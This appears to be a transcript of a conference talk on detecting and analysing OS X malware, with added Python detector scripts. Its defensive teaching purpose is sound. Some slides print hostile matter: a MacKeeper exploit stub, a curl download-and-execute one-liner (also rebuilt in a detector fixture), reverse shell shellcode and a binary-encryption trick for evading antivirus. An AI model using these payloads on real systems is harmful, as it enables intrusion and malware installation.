let's play doctor....by patrick wardle

Upload: shakacon

Post on 14-Apr-2017

TRANSCRIPT

Page 1: Let's Play Doctor....by Patrick Wardle

LET’S PLAY DOCTOR practical os x malware detection & analysis

@patrickwardle

Page 2:

WHOIS

"leverages the best combination of humans and technology to discover security vulnerabilities in our customers' web apps, mobile apps, IoT devices and infrastructure endpoints" (career)

security for the 21st century (hobby)

@patrickwardle

Page 3:

OUTLINE: STEPS TO A HAPPIER, HEALTHIER 2016

outbreaks

virology

diagnostics

analysis

health & happiness

Page 4:

PART 0X1: OUTBREAKS. OVERVIEW OF RECENT OS X MALWARE SPECIMENS

Page 5:

MALWARE ON OS X: YES; IT EXISTS AND IS GETTING MORE PREVALENT

"It doesn't get PC viruses. A Mac isn't susceptible to the thousands of viruses plaguing Windows-based computers." - apple.com (2012)

2014: "nearly 1000 unique attacks on Macs; 25 major families" - kaspersky

2015: "The most prolific year in history for OS X malware... 5x more OS X malware appeared in 2015 than during the previous five years combined" - bit9

2015: OS X most vulnerable software by CVE count - cvedetails

Page 6:

OSX/IWORM: 'STANDARD' BACKDOOR, PROVIDING SURVEY, DOWNLOAD/EXECUTE, ETC.

    # fs_usage -w -f filesys
    20:28:28.727871  open   /Library/LaunchDaemons/com.JavaW.plist
    20:28:28.727890  write  B=0x16b

infection: infected torrents

persisting: launch daemon (launch daemon plist)

features: survey, download, execute

Page 7:

OSX/CRISIS (RCSMAC): HACKING TEAM'S IMPLANT; COLLECT ALL THINGS!

persistence: launch agent (leaked source code)

rootkit component

intelligence collection

"HackingTeam Reborn; Analysis of an RCS Implant Installer"

Page 8:

OSX/XCODEGHOST: APPLICATION INFECTOR

    $ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
    ...
    Name = ALL_OTHER_LDFLAGS;
    DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $(OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices";

modified Ld.xcspec file: the appended -force_load links the attacker's CoreServices framework into every app built with the trojanized Xcode

source -> compile (infected Xcode) -> app store -> infected app -> app installed -> infected :(

found by: Claud Xiao

Page 9:

OSX/GENIEO (INKEEPR): MOST PROLIFIC OS X ADWARE

browser extension(s)

fake installers

bundled with apps

ADs

Page 10:

OSX/BACKDOOR(?): BOT/BACKDOOR THAT EXPLOITS MACKEEPER

    <script>window.location.href='com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/<BASE_64_ENCODED_STUB>';...

"[a] flaw in MacKeeper's URL handler implementation allows arbitrary remote code execution when a user visits a specially crafted web page" - baesystems

exploit & payload:

    curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh

persistence: launch agent

features: shell, download, execute, survey
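How a detector would pick such a URL out of a page and recover what it hands to MacKeeper, as an added example (not code from the talk or from BAE's write-up). It assumes the path layout shown on the slide, /i/<class>/<selector>/<argument>, and that the <BASE_64_ENCODED_STUB> is the base64 of the shell one-liner the slide shows beside it; SAMPLE_HTML is a fixture constructed from those two pieces, with the host left as <redacted>.

```python
"""Find MacKeeper 'com-zeobit-command' URLs in a page and decode their argument.

Added example, not code from the talk or BAE's write-up. Assumes the path
layout /i/<class>/<selector>/<argument> from the slide and that the argument
is base64 of a shell command; SAMPLE_HTML is built here from the slide's
one-liner (host left as <redacted>).
"""
import base64
import binascii
import re

SCHEME = "com-zeobit-command://"
URL_RE = re.compile(r"com-zeobit-command://[^\s'\"<>]+")
# The selector the exploit drove: MacKeeper's helper runs the argument for the caller.
DANGEROUS_SELECTORS = {"performActionWithHelperTask:arguments:"}

# Constructed payload: the one-liner from the slide, host still redacted.
PAYLOAD = ("curl -A 'Safari' -o /Users/Shared/dufh "
           "http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; "
           "chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh")
STUB = base64.b64encode(PAYLOAD.encode()).decode()
SAMPLE_HTML = ("<html><body><script>window.location.href='"
               + SCHEME + "/i/ZBAppController/performActionWithHelperTask:arguments:/" + STUB
               + "';</script></body></html>")


def parse_command_url(url):
    """Split scheme:///i/<class>/<selector>/<argument>; None if it is not that shape."""
    if not url.startswith(SCHEME):
        return None
    parts = url[len(SCHEME):].lstrip("/").split("/", 3)   # base64 may itself contain '/'
    if len(parts) < 3:
        return None
    return {"class": parts[1], "selector": parts[2],
            "argument": parts[3] if len(parts) > 3 else ""}


def decode_argument(arg):
    """Strict base64 (standard or URL-safe alphabet) to text; None if it is neither."""
    padded = arg + "=" * (-len(arg) % 4)
    for altchars in (None, b"-_"):
        try:
            return base64.b64decode(padded, altchars=altchars, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return None


def find_command_urls(html):
    """Dangerous-selector URLs in the page, each with its decoded payload (or None)."""
    hits = []
    for url in URL_RE.findall(html):
        cmd = parse_command_url(url)
        if cmd and cmd["selector"] in DANGEROUS_SELECTORS:
            cmd["payload"] = decode_argument(cmd["argument"])
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for hit in find_command_urls(SAMPLE_HTML):
        print(hit["class"], hit["selector"])
        print("  payload:", hit["payload"])
```

The selector check is the point: any com-zeobit-command URL naming performActionWithHelperTask:arguments: is passing a command to MacKeeper's privileged helper, so it is flagged whether or not the argument decodes cleanly; the decoded text is just what you show the analyst.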

Page 11:

OSX/KERANGER: FIRST (IN-THE-WILD, FUNCTIONAL) OS X RANSOMWARE

official app website (transmissionbt.com); distributing!

'validly' signed

encrypts: /Users/*; /Volumes: *.doc, *.jpg, etc

Page 12:

OSX/CARETO ('MASK'): 'CYBER ESPIONAGE BACKDOOR'

infection: phishing/exploits

persistence: launch agent [~/Library/LaunchAgents/com.apple.launchport.plist]

disassembly (encoded strings):

    lea  rdi, encodedServer ; "\x16d\n~\x1AcM!"...
    mov  rsi, decodedServer
    call __Dcd
    ...
    mov  rdi, decodedServer
    mov  esi, cs:_port
    call _sbd_connect

debugging (decoding C&C):

    $ lldb OSX_Careto
    (lldb) target create "OSX_Careto"
    Current executable set to 'OSX_Careto' (x86_64).
    (lldb) b _Dcd
    Breakpoint 1: where = OSX_Careto`_Dcd, ...
    ...
    (lldb) x/s decodedServer
    0x100102b40: "itunes212.appleupdt.com"

Page 13:

PART 0X2: VIROLOGY. STUDY OF OS X MALWARE CHARACTERISTICS & COMMONALITIES

Page 14:

INFECTION VECTORS, METHOD 0X1: VIA USER-INTERACTION

fake codecs

fake installers/updates

infected torrents

rogue "AV" products???

poor naive users!

Page 15:

INFECTION VECTORS, METHOD 0X2: EXPLOITS

"interested in buying zero-day vulnerabilities with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploitation] techniques on OS X" - V. Toropov (email to hacking team)

how the real hackers do it:

    ; OSX x64 reverse tcp shell (131 bytes, shell-storm.org)
    ; "\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" +
    ; "\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" +
    ; "\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" +
    ; "\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" +
    ; "\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" +
    ; "\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" +
    ; "\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" +
    ; "\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" +
    ; "\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"

Page 16:

PERSISTENCE: MANY OPTIONS, FEW USED

launch daemons & agents

user login items

browser extensions & plugins

~20 techniques: [RSA 2015] "Malware Persistence on OS X"

Page 17:

FEATURES: DEPENDENT ON THE GOALS OF THE MALWARE

[criminal]: ads, clicks, money

[espionage]: shell, video, audio, keylogs, surveys, downloads, exec's

Page 18:

SUMMARY: THE CURRENT STATE OF OS X MALWARE

infection: trojans/phishing; some exploits

persistence: well known methods; majority: launch items

features: poorly implemented; suffice for the job

self-defense: minimal obfuscation; trivial to detect/remove

psp bypass: occasional anti-AV; no psp detection

stealth: 'hide' in plain sight; rootkits? not common

Page 19:

PART 0X3: DIAGNOSTICS. ARE YOU INFECTED?

Page 20:

VISUALLY OBSERVABLE INDICATORS: MORE OFTEN THAN NOT, YOU'RE NOT INFECTED...

unlikely malware: "my computer is so slow"; "it keeps crashing"; "so many processes"

possibly malware: ADs; "there are tons of popups"; "my computer says it's infected"; "my homepage and search engine are weird"

most not trivially observable!

Page 21:

VISUALLY OBSERVABLE INDICATORS: GENERIC ALERTS MAY INDICATE THE PRESENCE OF MALWARE

persistence (BlockBlock)

network access (LittleSnitch)

such tools do not attempt to directly detect malware per-se...

Page 22:

STEP 0X1: KNOWN MALWARE. ANY KNOWN MALWARE RUNNING ON YOUR SYSTEM?

TaskExplorer (+VirusTotal integration)

VT ratios

Page 23:

STEP 0X2: SUSPICIOUS PROCESSES. ANY UNRECOGNIZED BINARIES RUNNING ON YOUR SYSTEM?

"global search" for: 3rd-party tasks; unsigned tasks

unsigned + "apple" + unrecognized (by VT) = suspicious!

Page 24:

STEP 0X3: SUSPICIOUS PERSISTENCE. ANY UNRECOGNIZED BINARIES PERSISTING ON YOUR SYSTEM?

KnockKnock; enum. persistence

unsigned + "apple" + unrecognized (by VT) = suspicious!

a suspicious launch item
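What KnockKnock-style triage of a launch item can check without VirusTotal or codesign, as an added example rather than KnockKnock's own code: the plist's label against where its program really lives. The three plists are constructed fixtures named after items in the talk (iWorm's com.JavaW.plist, the MacKeeper exploit's com.apple.updater.plist and /Users/Shared/dufh from the fs_usage trace, and Apple's own apsd); the JavaW and apsd program paths and every key besides Label/ProgramArguments are assumptions. The signing and VT legs of the "unsigned + apple + unrecognized" rule still have to be run separately.

```python
"""Offline triage of launchd plists: the 'apple'-named-but-not-Apple check.

Added example, not KnockKnock's code. The plists are constructed fixtures
named after items in the talk; see the comments for what is assumed.
"""
import plistlib
import posixpath

APPLE_PROGRAM_DIRS = ("/System/", "/usr/", "/bin/", "/sbin/")          # where real Apple launch items live
WORLD_WRITABLE_DIRS = ("/Users/Shared/", "/tmp/", "/private/tmp/", "/var/tmp/")

APPLE_LABEL_IMPERSONATION = "com.apple.* label but program is outside Apple's system directories"
WORLD_WRITABLE_PROGRAM = "program lives in a world-writable staging directory"
USER_PLIST_APPLE_LABEL = "com.apple.* label installed in a per-user LaunchAgents folder"
THIRD_PARTY = "third-party program: verify its code signature and VirusTotal status"
NO_PROGRAM = "no Program/ProgramArguments: nothing to run"


def program_of(item):
    """launchd runs Program if present, otherwise ProgramArguments[0]."""
    if item.get("Program"):
        return item["Program"]
    args = item.get("ProgramArguments") or []
    return args[0] if args else None


def triage_launch_item(plist_path, plist_bytes):
    """Reasons a launch item deserves a look; an empty list means nothing odd was found offline."""
    item = plistlib.loads(plist_bytes)
    label = item.get("Label", "")
    program = program_of(item)
    if program is None:
        return [NO_PROGRAM]
    program = posixpath.normpath(program)      # defeat /Users/Shared/../Shared/dufh style games
    apple_label = label.startswith("com.apple.")
    reasons = []
    if apple_label and not program.startswith(APPLE_PROGRAM_DIRS):
        reasons.append(APPLE_LABEL_IMPERSONATION)
    if program.startswith(WORLD_WRITABLE_DIRS):
        reasons.append(WORLD_WRITABLE_PROGRAM)
    if apple_label and plist_path.startswith("/Users/") and "/Library/LaunchAgents/" in plist_path:
        reasons.append(USER_PLIST_APPLE_LABEL)
    if not program.startswith(APPLE_PROGRAM_DIRS):
        reasons.append(THIRD_PARTY)
    return reasons


def fixture(label, args):
    """Constructed plist bytes with the keys a typical launch item carries."""
    return plistlib.dumps({"Label": label, "ProgramArguments": args, "RunAtLoad": True})


# Constructed: iWorm's daemon (label from the slide; program path assumed).
IWORM = ("/Library/LaunchDaemons/com.JavaW.plist",
         fixture("com.JavaW", ["/Library/Application Support/JavaW/JavaW"]))
# Constructed: the MacKeeper-exploit agent (label from the fs_usage slide; that it runs dufh is assumed).
DUFH = ("/Users/user/Library/LaunchAgents/com.apple.updater.plist",
        fixture("com.apple.updater", ["/Users/Shared/dufh"]))
# Constructed: a genuine Apple daemon for contrast (program path assumed).
APSD = ("/System/Library/LaunchDaemons/com.apple.apsd.plist",
        fixture("com.apple.apsd", ["/System/Library/PrivateFrameworks/ApplePushService.framework/apsd"]))
# Constructed: a plist with nothing to run.
EMPTY = ("/Library/LaunchAgents/com.example.empty.plist", plistlib.dumps({"Label": "com.example.empty"}))

if __name__ == "__main__":
    for path, blob in (IWORM, DUFH, APSD, EMPTY):
        print(path, "->", triage_launch_item(path, blob) or ["ok"])
```

Note that iWorm comes back with only the third-party reason: a launch daemon with an honest-looking label and a program under /Library/Application Support is exactly the case where the missing legs (is JavaW signed? does VirusTotal know the hash?) decide the call.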

Page 25:

STEP 0X4: NETWORK I/O. ODD PORTS OR UNRECOGNIZED CONNECTIONS?

    # sudo lsof -i | grep ESTABLISHED
    apsd        75 root  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
    apsd        75 root  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
    com.apple 1168 user  TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED)
    JavaW     1184 root  TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED)

iWorm ('JavaW') connected to its C&C server on an odd high port

grep for 'LISTEN' to catch iWorm ('JavaW') listening for the attacker's connection, or 'ESTABLISHED' for connected sessions
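The same triage over lsof output as a script, as an added example (not from the talk): parse the rows, drop the per-file-descriptor duplicates lsof prints, and flag listeners you do not recognise plus established sessions to ports a stock Mac does not normally use. SAMPLE is constructed from the slide's output with lsof's FD/TYPE/DEVICE/SIZE/NODE columns put back in lsof's normal layout; the device numbers and the port iWorm listens on are made up (the slide only says that it listens).

```python
"""Parse `lsof -i` rows and flag odd ports / unexpected listeners.

Added example, not from the talk. SAMPLE is constructed from the slide's
output with lsof's FD/TYPE/DEVICE/SIZE/NODE columns restored; device
numbers and the iWorm listening port are made up.
"""
import re

SAMPLE = """\
COMMAND    PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
apsd        75 root    5u  IPv4 0xffffff8012345678      0t0  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
apsd        75 root    6u  IPv4 0xffffff8012345678      0t0  TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED)
com.apple 1168 user    7u  IPv4 0xffffff8023456789      0t0  TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED)
JavaW     1184 root    3u  IPv4 0xffffff8034567890      0t0  TCP *:47878 (LISTEN)
JavaW     1184 root    4u  IPv4 0xffffff8045678901      0t0  TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED)
"""

ROW = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+"
    r"(?P<proto>TCP|UDP)\s+(?P<name>\S+)(?:\s+\((?P<state>[A-Z_]+)\))?\s*$")

# Remote ports a stock Mac talks to all day (APNs is 5223); anything else gets a look.
EXPECTED_REMOTE_PORTS = {"http", "80", "https", "443", "5223", "imaps", "993",
                         "submission", "587", "domain", "53"}


def parse_lsof(text):
    """One dict per socket row; the header and unparsable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        row = m.groupdict()
        local, _, remote = row["name"].partition("->")
        row["local"], row["remote"] = local, remote or None
        rows.append(row)
    return rows


def remote_port(remote):
    """'188.167.254.92:51667' -> '51667'; lsof prints a service name when it knows one."""
    return remote.rsplit(":", 1)[1] if remote and ":" in remote else None


def odd_connections(text, expected_ports=EXPECTED_REMOTE_PORTS, known_listeners=frozenset()):
    """(command, pid, why) for listeners you don't recognise and sessions to unexpected ports."""
    seen, odd = set(), []
    for row in parse_lsof(text):
        key = (row["cmd"], row["pid"], row["name"], row["state"])
        if key in seen:                       # lsof repeats a socket once per file descriptor
            continue
        seen.add(key)
        if row["state"] == "LISTEN" and row["cmd"] not in known_listeners:
            odd.append((row["cmd"], row["pid"], "listening on " + row["local"]))
        elif row["state"] == "ESTABLISHED" and remote_port(row["remote"]) not in expected_ports:
            odd.append((row["cmd"], row["pid"], "established to " + row["remote"]))
    return odd


if __name__ == "__main__":
    for cmd, pid, why in odd_connections(SAMPLE):
        print(f"{cmd} (pid {pid}): {why}")
```

The port allowlist is a triage aid, not a verdict: a C&C on 443 sails through it, which is why the slide pairs this step with the signature and VirusTotal checks on the process itself.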

Page 26:

STEP 0X5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC. COUNTLESS OTHER THINGS TO LOOK FOR....

any suspicious kernel extensions? (uncheck 'Show OS Kexts')

hijacked dylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"

Page 27:

PART 0X4: ANALYSIS. DETERMINE IF SOMETHING IS MALICIOUS... OR NOT!?

Page 28:

CODE-SIGNING: EXAMINE THE BINARY'S CODE SIGNATURE

use codesign to display a binary's signing info, ex: $ codesign -dvv <file>

    $ codesign -dvv /usr/lib/libtidy.A.dylib
    Format=Mach-O universal (i386 x86_64)
    ...
    Authority=Software Signing
    Authority=Apple Code Signing Certification Authority
    Authority=Apple Root CA

libtidy dylib flagged by VT, but libtidy is signed by apple proper; signed by apple: not malware!

    $ codesign -dvv OSX_Careto
    OSX_Careto: code object is not signed at all

most malware: unsigned
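Reading the Authority chain mechanically, as an added example (not the talk's code). LIBTIDY and CARETO are the two outputs from this slide, trimmed; DEVID is an assumed Developer ID chain, the shape a third-party signed binary prints. The distinction matters because "signed" is not "signed by Apple proper": KeRanger on slide 11 was 'validly' signed too, so only a chain whose leaf is Software Signing gets the not-malware pass.

```python
"""Classify `codesign -dvv` output by its Authority chain.

Added example, not the talk's code. LIBTIDY and CARETO are the outputs shown
on the slide (trimmed); DEVID is an assumed Developer ID chain.
"""
import re

LIBTIDY = """\
Executable=/usr/lib/libtidy.A.dylib
Identifier=com.apple.libtidy
Format=Mach-O universal (i386 x86_64)
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
"""
CARETO = "OSX_Careto: code object is not signed at all\n"
# Assumed shape of a Developer ID chain (not on the slide).
DEVID = """\
Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=org.example.app
Format=app bundle with Mach-O thin (x86_64)
Authority=Developer ID Application: Example Corp (ABCDE12345)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
"""

APPLE_PROPER = "apple-proper"
DEVELOPER_ID = "developer-id"
UNSIGNED = "unsigned"
OTHER = "other"          # ad-hoc, self-signed, or a chain this script does not recognise


def authorities(output):
    """Authority= lines, leaf first and root last, the order codesign prints them."""
    return [m.group(1).strip() for m in re.finditer(r"^Authority=(.*)$", output, re.M)]


def classify(output):
    if "code object is not signed at all" in output:
        return UNSIGNED
    chain = authorities(output)
    if not chain or chain[-1] != "Apple Root CA":
        return OTHER                          # a chain not anchored at Apple proves nothing
    if chain[0] == "Software Signing":
        return APPLE_PROPER                   # Apple's own binaries (libtidy on the slide)
    if chain[0].startswith("Developer ID Application:"):
        return DEVELOPER_ID                   # third party; KeRanger-style 'validly' signed
    return OTHER


def apple_named(name):
    return "apple" in name.lower()


def suspicious(name, output):
    """The slide's rule minus the VT leg: not Apple-proper, yet trading on Apple's name."""
    return classify(output) != APPLE_PROPER and apple_named(name)


if __name__ == "__main__":
    for name, out in (("libtidy.A.dylib", LIBTIDY), ("OSX_Careto", CARETO), ("Example", DEVID)):
        print(f"{name}: {classify(out)} suspicious={suspicious(name, out)}")
```

On a live system, feed it the stderr of `codesign -dvv <file>`; codesign writes the details there, not to stdout.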

Page 29:

GOOGLE THE HASH: MAY (QUICKLY) TELL YOU; KNOWN GOOD || KNOWN BAD

    $ md5 appleUpdater
    MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088

known hash (OSX/Careto)

unknown hash... might be odd

‣ 3rd-party binaries may produce zero hits on google

‣ 0% detection on virustotal doesn't mean 100% not malware

Page 30:

STRINGS: QUICKLY TRIAGE A BINARY'S FUNCTIONALITY (use with the -a flag; google interesting strings)

    $ strings -a OSX_Careto
    reverse lookup of %s failed: %s
    bind(): %s
    connecting to %s (%s) [%s] on port %u
    executing: %s
    cM!M>`W9_c[0;32m

strings; OSX/Careto: networking & exec logic, encoded strings

    $ strings -a JavaW
    $Info: This file is packed with the UPX executable packer $
    $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team.

strings; iWorm: packed (UPX)

Page 31:

FILE ATTRIBUTES: OS X NATIVELY SUPPORTS ENCRYPTED BINARIES

disassembling Finder.app: encrypted with Blowfish; key string "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleC"

encrypting the malware:

    $ strings -a myMalware
    infectUser: ALOHA RSA!
    $ ./protect myMalware
    encrypted 'myMalware'
    $ strings -a myMalware
    n^jd[P5{Qr_`EYFaJq07

known malware: ~50% drop VT detection

Page 32:

FILE ATTRIBUTES: DETECTING ENCRYPTED BINARIES

    //check all load commands
    for(int i = 0; i < [machoHeader[LOAD_CMDS] count]; i++)
    {
        //grab load command
        loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];

        //only segment commands carry a segname/flags
        if( (LC_SEGMENT != loadCommand->cmd) && (LC_SEGMENT_64 != loadCommand->cmd) )
            continue;

        //check text segment
        if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)))
        {
            //check if segment is protected
            if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1))
            {
                //FILE IS ENCRYPTED
            }
        }
    }

detecting encryption (TaskExplorer)

unsigned + encrypted = suspicious

Page 33:

FILE ATTRIBUTES: MALWARE IS OFTEN PACKED TO 'HINDER' DETECTION/ANALYSIS

    $ strings -a JavaW
    Info: This file is packed with the UPX executable packer http://upx.sf.net
    Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved.

iWorm (JavaW); packed

generic packer detection algorithm (TaskExplorer):

    //count all occurrences
    for(NSUInteger i = 0; i < length; i++)
        occurrences[0xFF & (int)data[i]]++;

    //calc entropy
    for(NSUInteger i = 0; i < sizeof(occurrences)/sizeof(occurrences[0]); i++)
    {
        //add occurrences to entropy
        if(0 != occurrences[i])
        {
            //calc ratio
            pX = occurrences[i]/(float)length;

            //cumulative entropy
            entropy -= pX*log2(pX);
        }
    }

view all packed tasks/dylibs
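The two static checks from slides 32 and 33 (the SG_PROTECTED_VERSION_1 flag on __TEXT, and byte entropy as a packer heuristic) in one script, as an added example and not TaskExplorer's code; they share the walk over Mach-O load commands, so they sit together here. It handles plain 64-bit little-endian Mach-O only (no fat/universal or 32-bit headers), and every binary it inspects is a synthetic fixture from build_macho(), not a real sample. Entropy is measured over the __TEXT segment's file bytes, which the slide's snippet leaves to the caller; measuring the whole file would let a large low-entropy resource area mask a packed text segment.

```python
"""Static file-attribute checks on a Mach-O: Apple's SG_PROTECTED_VERSION_1
'encrypted binary' flag on __TEXT and Shannon entropy of __TEXT as a packer
heuristic. Added example, not TaskExplorer's code; 64-bit little-endian
Mach-O only, and build_macho() makes a synthetic fixture, not a real sample.
"""
import hashlib
import math
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_SEGMENT_64 = 0x19
SG_PROTECTED_VERSION_1 = 0x8
MACH_HEADER_64 = "<IiiIIIII"        # magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
SEGMENT_64_BODY = "<16sQQQQiiII"    # segname, vmaddr, vmsize, fileoff, filesize, maxprot, initprot, nsects, flags
HEADER_SIZE = struct.calcsize(MACH_HEADER_64)           # 32
SEGMENT_SIZE = 8 + struct.calcsize(SEGMENT_64_BODY)     # 72: cmd + cmdsize + body, no sections
PACKED_ENTROPY_THRESHOLD = 7.0      # bits/byte; compressed or encrypted data sits near 8


def build_macho(text_bytes, protected=False):
    """Constructed fixture: a minimal x86_64 Mach-O whose only load command is a __TEXT segment."""
    header = struct.pack(MACH_HEADER_64, MH_MAGIC_64, 0x01000007, 3, 2, 1, SEGMENT_SIZE, 0x85, 0)
    flags = SG_PROTECTED_VERSION_1 if protected else 0
    segment = struct.pack("<II", LC_SEGMENT_64, SEGMENT_SIZE) + struct.pack(
        SEGMENT_64_BODY, b"__TEXT", 0x100000000, len(text_bytes),
        HEADER_SIZE + SEGMENT_SIZE, len(text_bytes), 7, 5, 0, flags)
    return header + segment + text_bytes


def segments(data):
    """Yield (segname, flags, fileoff, filesize) for every LC_SEGMENT_64 load command."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != MH_MAGIC_64:
        raise ValueError("not a 64-bit little-endian Mach-O")
    ncmds, sizeofcmds = struct.unpack_from("<II", data, 16)
    offset, end = HEADER_SIZE, min(HEADER_SIZE + sizeofcmds, len(data))
    for _ in range(ncmds):
        if offset + 8 > end:
            raise ValueError("load commands run past the file")
        cmd, cmdsize = struct.unpack_from("<II", data, offset)
        if cmdsize < 8 or offset + cmdsize > end:
            raise ValueError("malformed load command")    # never trust sizes read from the file
        if cmd == LC_SEGMENT_64 and cmdsize >= SEGMENT_SIZE:
            name, _va, _vs, fileoff, filesize, _mp, _ip, _ns, flags = \
                struct.unpack_from(SEGMENT_64_BODY, data, offset + 8)
            yield name.rstrip(b"\0").decode("ascii", "replace"), flags, fileoff, filesize
        offset += cmdsize


def is_encrypted(data):
    """True when __TEXT carries SG_PROTECTED_VERSION_1, the slide-32 check."""
    return any(name == "__TEXT" and flags & SG_PROTECTED_VERSION_1
               for name, flags, _, _ in segments(data))


def entropy(buf):
    """Shannon entropy in bits per byte (0.0 .. 8.0), the slide-33 algorithm."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def text_entropy(data):
    """Entropy of the __TEXT segment's file bytes (0.0 if there is no __TEXT)."""
    for name, _flags, fileoff, filesize in segments(data):
        if name == "__TEXT":
            return entropy(data[fileoff:fileoff + filesize])
    return 0.0


def looks_packed(data, threshold=PACKED_ENTROPY_THRESHOLD):
    return text_entropy(data) >= threshold


# Constructed __TEXT contents: repetitive code-like bytes versus high-entropy bytes
# (SHA-256 outputs stand in for packed/encrypted data).
PLAIN_TEXT = b"infectUser: ALOHA RSA!\0\x55\x48\x89\xe5" * 150
RANDOM_TEXT = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))

if __name__ == "__main__":
    for label, blob in (("plain", build_macho(PLAIN_TEXT)),
                        ("protected", build_macho(PLAIN_TEXT, protected=True)),
                        ("packed", build_macho(RANDOM_TEXT))):
        print(f"{label}: encrypted={is_encrypted(blob)} "
              f"text_entropy={text_entropy(blob):.2f} packed={looks_packed(blob)}")
```

Both signals are triage, not verdicts: Apple ships SG_PROTECTED binaries itself (slide 31), and a legitimately UPX-packed tool scores the same entropy as iWorm, which is why the slides combine them with the signing and VT checks.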

Page 34:

CLASS-DUMP: EXTRACT CLASS NAMES, METHODS, & MORE... (http://stevenygard.com/projects/class-dump/)

RCSMac (OSX/Crisis):

    $ class-dump RCSMac.app
    @interface __m_MCore : NSObject
    {
        NSString *mBinaryName;
        NSString *mSpoofedName;
    }
    - (BOOL)getRootThroughSLI;
    - (BOOL)isCrisisHookApp:(id)arg1;
    - (BOOL)makeBackdoorResident;
    - (void)renameBackdoorAndRelaunch;
    @end

Adware 'Installer' (InstallCore):

    $ class-dump Installer.app
    @interface ICDownloader : NSObject <NSURLConnectionDelegate>
    {
        NSURL *_URL;
        NSString *_destPath;
        long long _httpStatusCode;
        NSString *_suggestedName;
    }
    - (void)startDownloading;
    @end

    @interface NSURL (ICEncryptedFileURLProtocol)
    + (id)fileURLWithURL:(id)arg1;
    + (id)encryptedFileURLWithURL:(id)arg1;
    @end

Page 35:

DYNAMIC FILE I/O: QUICKLY DETERMINE A BINARY'S FILE-RELATED ACTIONS

    $ man fs_usage
    FS_USAGE(1)            BSD General Commands Manual
    fs_usage -- report system calls and page faults related to filesystem activity in real-time

file i/o (mackeeper exploiter):

    # fs_usage -w -f filesystem
    open    /Users/user/Library/LaunchAgents/com.apple.updater.plist
    write   F=2  B=0x4a
    open    F=5  /Users/Shared/dufh
    ...
    chmod   <rwxr-xr-x>  /Users/Shared/dufh
    unlink  ./mackeeperExploiter

persistence as launch agent (com.apple.updater.plist); installation (/Users/Shared/dufh); self deletion, cleanup (unlink)

Page 36:

NETWORK I/O: GAIN INSIGHT INTO THE BINARY'S NETWORK COMMUNICATIONS

OSX/Careto in Wireshark (note: C&C is (now) offline)

odd DNS queries: "itunes212.appleupdt.com"

periodic beacons

(custom) encrypted traffic

Page 37:

VIRUSTOTAL SANDBOX: FILE I/O + NETWORK I/O, AND MORE!

virustotal portal: file i/o (iWorm); network i/o (iWorm)

